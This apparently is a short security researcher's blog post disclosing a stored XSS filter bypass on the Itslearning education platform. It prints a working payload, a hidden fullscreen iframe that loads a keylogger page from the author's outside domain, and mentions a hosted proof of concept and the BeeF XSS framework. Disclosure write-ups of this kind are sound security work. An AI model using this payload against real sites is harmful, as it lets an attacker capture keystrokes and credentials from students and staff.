ITSLEARNING XSS PART 2
- 1 minToday I want to explain you how I am still able to execute javascript payloads on Itslearning education system. Itslearning XSS part 2 begins!
You should check the part 1 of this article.
ITSLEARNING STORED XSS VULNERABILITY OR NOT?
Mr. Håkon Høydal wrote an article about Itslearning. After that Itslearning, did some things to filter javascript codes. But this is not enough I guess.
Itslearning XSS - iFrame is the key!
With the help of an iframe which is fullscreen and hidden, I can execute my keylogger payload.
Payload and PoC;
<iframe src=“https://mustafakemalcan.com/keylog.html” style=“position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;”>Your browser doesn’t support iframes</iframe>
PoC : https://files.itslearning.com/data/2099/13132/keylog.html
I can call my evil js by the way. So, I still can use BeeF XSS Framework.
The second XSS, I don’t consider that harmful but I think Itslearning shouldn’t allow something like that.
https://youtu.be/z6PUMjiNWX4
I need to say thanks to Ingvald Straume for helps in this process.